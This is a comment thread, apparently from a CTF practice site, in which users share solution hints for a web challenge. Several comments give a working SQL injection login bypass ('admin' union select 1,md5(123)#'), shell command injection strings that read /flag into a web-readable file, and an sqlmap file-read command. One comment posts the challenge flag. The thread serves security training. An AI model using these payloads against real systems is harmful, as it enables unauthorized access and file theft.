这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
好啊好啊,坑我3次了,每次一测试环境就崩,啥东西呀
sqlmap -r xxx.txt --batch --file-read=/flag
username=admin' union select 1,md5(123)#&password=123 进入命令界面,ls没有内容,所以有可能在上层目录。123| cat ../../../../flag > test 把flag写进test文件,再http://114.67.175.224:14269/test 读出来就行了。
flag{41723f653c0ac767a1c15f26177c416e}
使用sqlmap获取账号密码登录,登录后发现命令有拦截,没办法爆出信息,结构看大佬回答,URL后加一个/test就能爆出,不明白为什么
1.burp看返回信息,发现一个奇怪的头协议,base64解码,--->得到sql查询的源码。2.分析源码构造admin'UNION SELECT 1,md5(123)#绕过密码判断。--->进入命令执行界面。利用|执行任意命令,用>将结果输出文件,最后在浏览器访问。即:123|cat flag>a
1、登陆页尝试疑似sql注入,查看源代码和请求包发现了tip为sql查询需要绕过登陆,可直接拼接构造 2、成功进入后发现是命令执行,但无法使用管道符号(有可能是过滤了也有可能是执行了但无返回),使用嗯sleep 5命令执行发现是执行了但无显示遂拼接命令尝试dnslog带外,发现不出网;遂尝试直接echo文件到当前目录,结果可行并发现flag文件在根目录。
有意思,不甘心直接重启,又仔细看了看。发现刚刚并不是机器g了,而是服务器上的apache_php不响应之前卡死的那个账号,也就是之前那个cookie-phpsessid了,访问其他静态资源/css/不受影响。 后面用个新的cookie就可以正常访问,看进程也能看到一直运行着的ping命令。~~感兴趣且已经打到这里的可以复现我现在这个情况试试,再进去看看代码咋写的
...
评论
Zhumeng 1天前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Zhumeng 1天前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Kyrie-Lrving 13天前
举报
好啊好啊,坑我3次了,每次一测试环境就崩,啥东西呀
cccczz 18天前
举报
sqlmap -r xxx.txt --batch --file-read=/flag
我是CTF大王 1月前
举报
username=admin' union select 1,md5(123)#&password=123 进入命令界面,ls没有内容,所以有可能在上层目录。123| cat ../../../../flag > test 把flag写进test文件,再http://114.67.175.224:14269/test 读出来就行了。
yychen 1月前
举报
flag{41723f653c0ac767a1c15f26177c416e}
linjiaming 2月前
举报
使用sqlmap获取账号密码登录,登录后发现命令有拦截,没办法爆出信息,结构看大佬回答,URL后加一个/test就能爆出,不明白为什么
.⎛⎝•̀ω•́⎠⎞. 9月前
举报
1.burp看返回信息,发现一个奇怪的头协议,base64解码,--->得到sql查询的源码。2.分析源码构造admin'UNION SELECT 1,md5(123)#绕过密码判断。--->进入命令执行界面。利用|执行任意命令,用>将结果输出文件,最后在浏览器访问。即:123|cat flag>a
kyang07 9月前
举报
1、登陆页尝试疑似sql注入,查看源代码和请求包发现了tip为sql查询需要绕过登陆,可直接拼接构造 2、成功进入后发现是命令执行,但无法使用管道符号(有可能是过滤了也有可能是执行了但无返回),使用嗯sleep 5命令执行发现是执行了但无显示遂拼接命令尝试dnslog带外,发现不出网;遂尝试直接echo文件到当前目录,结果可行并发现flag文件在根目录。
bugku2024 9月前
举报
有意思,不甘心直接重启,又仔细看了看。发现刚刚并不是机器g了,而是服务器上的apache_php不响应之前卡死的那个账号,也就是之前那个cookie-phpsessid了,访问其他静态资源/css/不受影响。 后面用个新的cookie就可以正常访问,看进程也能看到一直运行着的ping命令。~~感兴趣且已经打到这里的可以复现我现在这个情况试试,再进去看看代码咋写的